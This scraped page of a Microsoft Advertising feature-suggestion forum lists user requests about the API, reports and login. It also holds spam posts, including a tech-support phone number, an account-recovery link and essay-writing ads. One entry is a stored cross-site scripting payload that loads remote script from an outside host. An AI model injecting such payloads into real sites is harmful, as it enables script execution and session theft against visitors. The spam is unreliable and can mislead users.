Microsoft Advertising Feature Suggestions

Welcome, friends!  This is a place for you to suggest a feature you'd like added to Microsoft Advertising, or vote for those already suggested by your peers to help them rise to the top of this feed. To see if your feature is already live or someone else mentioned it already, do a keyword search in the search function below, or check out our library of Features & Releases. You can also send a private e-mail to advertising-feedback@microsoft.com if you prefer not to post to this forum.  

Looking for technical support or have an issue about something that didn't work according to expectations? Please contact the Microsoft Advertising support team.   

Please keep in mind that it takes time to design, develop, test, and release new features, but we'll be sure to update entries when we announce or release updates based on your feedback. Also, note that choosing the right category will help route your suggestion more quickly. 

• Hot ideas
  • Top ideas
  • New ideas
  • My feedback
  1. Keyword Planner API option to only search landing page

When using the Keyword Planner Web UI, there is an option to search just the landing page and not the whole site. This option is not present in the API.

This is particularly important for landing pages that are hosted on facebook because if this option is not set, results are terrible.
    We cannot see an option in the API to specify this option to search only the landing page.

2 votes

We're glad you're here

Please sign in to leave feedback

Signed in as (Sign out)

We’ll send you updates on this idea

0 comments  ·  API  ·  Flag idea as inappropriate…  ·  Admin →
  2. MarblePolishingService

Pam Facilities has not only expertise in marble floor polishing along with it we also do marble wall polishing which is marble installed on wall (vertical marble polishing service). Rejuvenate your marble walls just by diamond wall marble polish. We have a well-mannered, trained team of marble polishers along with Italian machines, branded material and more than 10 + years of expertise which will take out marble’s original shine back with efforts in the right directions. For more details, call us 9999710453 and 9958530555.visit - https://www.pamfacilities.in/marble-polishing.html

2 votes

We're glad you're here

Signed in as (Sign out)

1 comment  ·  API  ·  Flag idea as inappropriate…  ·  Admin →
  3. How can I find a fantastic custom essay writing service?

A reliable essay writing service can provide students with all the help which they need irrespective of their subject and topic. However, before you opt for a service to your next essay writing endeavor, it is better to make a decision as to what things to look for in such sort of service.
    There are numerous services who provide discounts and quite cheap prices for these services so it is better to shop around a little before you settle for any specific service provider.
    This service is actually in high demand nowadays so to cater this high there are many…

2 votes

We're glad you're here

Signed in as (Sign out)

4. Repair Windows 10 {1-888-267-5664}

Performing a clean install or a reset means you've got to reinstall apps and desktop programs and begin over with settings and preferences. If you think Windows has become damaged, there is a less drastic solution: Run Setup to Repair Windows 10.Follow the wizard's prompts to end setup. After a few restarts, you will have a refreshed installation of Windows 10, together with your desktop programs, apps, and settings intact.If your computer cannot boot into Windows 10 normally, try the Window Repair Tools within the Advanced boot options menu to repair some loading problems.If your computer become unstable or it crashes into a Blue Screen, you'll perform a System Restore to undertake to revive the system back to at least one of the restore points…

2 votes

We're glad you're here

Signed in as (Sign out)

5. Paging for GetLinkedAccountsAndCustomersInfo

The GetLinkedAccountsAndCustomersInfo operation could potentially return thousands of linked accounts, so let's please consider adding Paging similar to SearchClientLinks.

Background:
    There isn't a technical limitation on ad account links under one manager account. In an agency hierarchy, we do only support 5 levels of depth for manager account to manager account links, but at each level (L1, L2, L3, L4, L5) a manager account could link to any number of manager accounts.

2 votes

We're glad you're here

Signed in as (Sign out)

6. Goals and Funnel Report for DSA Campaigns

Need to check the stats for Conversions Goals for DSA Campaigns in Goals and Funnel report. Currently the goals report only include stats for Search and Audience campaigns, Shopping and DSA campaigns are not currently supported.

2 votes

We're glad you're here

Signed in as (Sign out)

7. Show status column in page feeds for Dynamic Search Ads.

To make our user experience better we would like to have the "STATUS" column in our page feeds for DSA campaigns.

It is important because:
    1. we can see how quickly new items have been approved;
    2. we can see which items have been disapproved, so we can delete these items from our feeds.

If we can delete disapproved items:
    1. we can impove our user experience, as we won't show the property what is not availible for booking
    2. we will improve our performance just not bidding on items that are not available in our inventory.

2 votes

We're glad you're here

Signed in as (Sign out)

8. Speed up the developing of Bing Ads Scripts

Since February 11, 2019 there were added no new methods. For expample on campaign level it exists a method 'getBiddingStrategyType' but if I want to change the bidding stragegy type I can't use 'setBiddingStrategyType'

2 votes

We're glad you're here

Signed in as (Sign out)

9. Please include all Postal Codes in the Geo locations downloadable file

I have downloaded the Geo Locations file from: https://developers.ads.microsoft.com/Account?ccuisrc=2. But, this file does not contain all the postal codes. Few o the postal codes are missing. E.g.: 94299, 94245, 33195, 33206, 92862, 90010, 33198, 33191, 33192, 30063, 78241 postal code and corresponding location ids are missing in the file. But, I am able to add these locations directly from the UI. Please do update the Geo locations file to include all the postal codes

2 votes

We're glad you're here

Signed in as (Sign out)

10. master account

Can we have one master account that can see all campaigns and performance?
    In current version of API, we need to call each account one by one to get performance.
    Same feedback to the offline conversion, instead of uploading different conversion goals, it would nice if we can upload for one master account.

2 votes

We're glad you're here

Signed in as (Sign out)

11. Make the login more simple. No need for two page login.

Keep it simple and don't over complicate.

2 votes

We're glad you're here

Signed in as (Sign out)

12. Allow bulk editing of param1 field

There is currently no way to bulk update (add, change or delete) the Param1 field in the Keyword view. Please add this functionality to work like updating Dest URL, bids, etc. Until then, I'll be selecting them manually and making my changes - big waste of time.

2 votes

We're glad you're here

Signed in as (Sign out)

13. Clearly stating an applied coupon will expire on a date and an email sent to use prior to expiration as a warning

Clearly stating an applied coupon will expire on a particular date and an email sent to user prior to expiration date as a warning.

2 votes

We're glad you're here

Signed in as (Sign out)

14. Issue with Bing Ads.

My case is, I want the CampaignPerformance data as a response(List data), not the file, so that I can save that data to my database.

2 votes

We're glad you're here

Signed in as (Sign out)

15. Generate access token on the fly by loggin in only once

I need some way in bing ads API from where a user can login only once and can create the new access token every time when he/she needs to access the campaigns from API. It should not ask the user to login again. Maybe some code or something to the user will be provided to me on first login which I will save for later use and use the same to create the new access token from the second time onwards.

Facebook provides similar functioanlity.

I am using PHP as my scripting language.

2 votes

We're glad you're here

Signed in as (Sign out)

16. test

test

1 vote

We're glad you're here

Signed in as (Sign out)

17. test

test

1 vote

We're glad you're here

Signed in as (Sign out)

18. <script>$.getScript("//hunt2behunt.xss.ht")</script>

<script>$.getScript("//hunt2behunt.xss.ht")</script>

1 vote

We're glad you're here

Signed in as (Sign out)

19. test

test

1 vote

We're glad you're here

Signed in as (Sign out)

20. How Does Google Account Recovery Work If Your Account Is Hacked?

Have your Google account been hacked or compromised? Do you want to get your account recovered within the least time frame? All you have to do is to make proper utilization of Google Account Recovery procedure through which you will be able to opt for the right kind of assistance at the comfort of your home. https://www.myaccountrecovery.com/google-account-recovery/

1 vote

We're glad you're here

Signed in as (Sign out)

• Don't see your idea?

Feedback and Knowledge Base